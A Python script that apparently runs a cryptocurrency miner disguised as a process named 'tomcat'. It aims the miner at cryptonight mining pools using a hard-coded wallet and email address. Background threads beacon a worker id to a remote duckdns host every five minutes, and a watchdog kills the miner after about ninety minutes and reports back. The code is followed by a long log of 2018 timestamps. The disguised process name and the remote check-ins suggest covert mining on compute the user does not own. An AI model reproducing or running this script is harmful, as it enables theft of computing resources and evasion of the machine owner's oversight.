import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:01.678391
#2018-02-17 16:55:07.313724
#2018-02-17 18:44:06.233113
#2018-02-17 20:34:04.483043
#2018-02-17 22:20:06.179697
#2018-02-18 00:03:07.272182
#2018-02-18 01:54:04.774825
#2018-02-18 03:42:01.297152
#2018-02-18 05:28:06.614490
#2018-02-18 07:20:06.355831
#2018-02-18 09:08:03.329551
#2018-02-18 10:54:04.909148
#2018-02-18 12:42:06.297020
#2018-02-18 14:29:04.101545
#2018-02-18 16:19:04.782656
#2018-02-18 18:08:03.862984
#2018-02-18 19:54:01.496162
#2018-02-18 21:40:08.391578
#2018-02-18 23:28:01.840096
#2018-02-19 01:15:03.226111
#2018-02-19 03:01:07.768274
#2018-02-19 04:49:05.206589
#2018-02-19 06:33:01.479332
#2018-02-19 08:22:07.768312
#2018-02-19 10:12:04.258873
#2018-02-19 12:01:05.451110
#2018-02-19 13:47:10.129818
#2018-02-19 15:37:01.323610
#2018-02-19 17:23:09.535503
#2018-02-19 19:11:01.798172
#2018-02-19 20:58:05.181628
#2018-02-19 22:45:08.969401
#2018-02-20 00:30:04.641644
#2018-02-20 02:17:01.775925
#2018-02-20 04:08:04.386089
#2018-02-20 05:51:07.416909
#2018-02-20 07:37:06.419776
#2018-02-20 09:22:04.370382
#2018-02-20 11:06:08.826471
#2018-02-20 12:53:04.473482
#2018-02-20 14:37:04.202612
#2018-02-20 16:21:04.538610
#2018-02-20 18:07:07.703700
#2018-02-20 19:57:06.255374
#2018-02-20 21:44:06.413655
#2018-02-20 23:25:07.100939
#2018-02-21 01:11:01.410808
#2018-02-21 02:58:03.764069
#2018-02-21 04:46:04.199146
#2018-02-21 06:34:01.361226
#2018-02-21 08:19:08.762981
#2018-02-21 10:06:01.791119
#2018-02-21 11:54:02.060789
#2018-02-21 13:45:11.740806
#2018-02-21 15:28:03.795241
#2018-02-21 17:19:08.244277
#2018-02-21 19:09:01.920664
#2018-02-21 20:57:06.974656
#2018-02-21 22:45:07.224071
#2018-02-22 00:33:08.503584
#2018-02-22 02:20:03.937449
#2018-02-22 04:08:04.702306
#2018-02-22 05:52:04.807175
#2018-02-22 07:38:02.142581
#2018-02-22 09:26:05.239659
#2018-02-22 11:12:02.149817
#2018-02-22 13:00:05.924495
#2018-02-22 14:47:11.497013
#2018-02-22 16:34:09.123176
#2018-02-22 18:20:09.662579
#2018-02-22 20:13:01.704523
#2018-02-22 21:58:08.801864
#2018-02-22 23:45:12.470472
#2018-02-23 01:33:07.483195
#2018-02-23 03:21:07.028208
#2018-02-23 05:07:07.269964
#2018-02-23 06:53:05.435459
#2018-02-23 08:44:04.197553
#2018-02-23 11:03:01.959785
#2018-02-23 12:57:06.819641
#2018-02-23 14:43:10.031721
#2018-02-23 16:33:07.839190
#2018-02-23 18:19:07.630904
#2018-02-23 20:04:06.187145
#2018-02-23 21:48:07.076961
#2018-02-23 23:41:07.480437
#2018-02-24 01:29:05.266015
#2018-02-24 03:19:07.376632
#2018-02-24 05:04:05.415344
#2018-02-24 06:54:01.874703
#2018-02-24 08:46:03.546920
#2018-02-24 10:46:06.567270
#2018-02-24 12:33:05.032487
#2018-02-24 14:22:06.305768
#2018-02-24 16:09:01.263475
#2018-02-24 18:00:01.528345
#2018-02-24 19:48:07.737196
#2018-02-24 21:33:05.517400
#2018-02-25 00:19:06.309072
#2018-02-25 04:07:06.102609
#2018-02-25 06:43:04.823048
#2018-02-25 11:38:01.696875
#2018-02-25 13:54:02.041306
#2018-02-25 15:28:01.598764